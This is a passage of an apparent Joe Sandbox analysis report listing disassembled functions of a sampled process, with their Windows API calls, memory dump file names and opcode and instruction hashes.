                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 73e4c44dfbde5e49fbc3b488a708611a0aeefbb9cbcf1d128f38fa5b779dfd95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1114F22A08A4F86FB906B24E54407CEAA4FF49765FD45376D92F467F0DEBCE4448610
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1529584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 15b6ed972d5416d79eac90ec8da7a322252691fe5da477b5a8b52c8d4c00e8d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B115422B04B4A8AFB50EF61E84416C73A4F719758FD00A35EA6E47B64EFBCD2948350
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d1612e03fd0c16682ba2ca1a0f2759109ac8d81b439d0d846e1ebae818eb32b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2514722A4864B85FB66AF16E44427DB6A0FB44B54FD18436DA5F432A1DFBCE890C370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d3567b6efcd5d8ba320e2947850ad0ede8341a64a56949b279e31717d43b0b2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3B11225360864A81FB24AB61E80127DF6A0EF89799FC58133DE0E477B5EF7CD0418724
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 803eba6ff31649e7235b39e315db9048ff9d9c1ecb4f78fabd3f92a2c075e05e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51A327A0568A85FB24AF20D8406BEB6B0FF44758FC58177CE0F876A4EFBC95449720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1512A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2124138010038f54997149509e1e503f99574355f749c6d48a30454d44694652
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51413260878A8AFB619F21D8503EDB7A4FB45748FD04136E64E87A68DFBCD644C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2123716050-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c9794c3b42709582e2906f4433896d7577a283744c57734ed01ad4ec0c06245
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF418032705BCB8AFB729F25D8503EDA794EB49788F844135DA4E4BAA8DF7CD2448710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15232E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15233A8: iswspace.MSVCRT(?,?,00000000,00007FF7D153D6EE,?,?,?,00007FF7D1530632), ref: 00007FF7D15233C0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(?,?,?,00007FF7D15232A4), ref: 00007FF7D152331C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2389812497-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: beb9a02507d0020e5df83b13a7ad2f7702788e55974cf8f532388b0e0054dcac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF219222E0C65B81FBA07B15941027DE690EF59B80FD88076DA4F8B7A4DEECE540D321
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3148396303
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 62ed8453b084583fac42654c7a84691a1a7561437b2953b65109ce16d138c36b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521BBA2B0965B80FF50AB55E4402BDE2A0AF81B80FD89137C90F437B5DEBCE4448360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1516A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D1523D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D2F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: iswalpha.MSVCRT ref: 00007FF7D1523D4F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: towupper.MSVCRT ref: 00007FF7D1523D75
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925,?,?,?,?,00007FF7D151B9B1), ref: 00007FF7D1516ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1516AD3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B8B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7D1516AE8,?,?,?,00007FF7D153EA0F,?,?,?,00007FF7D153E925), ref: 00007FF7D1516B97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1516B84: RtlFreeHeap.NTDLL ref: 00007FF7D1516BAF
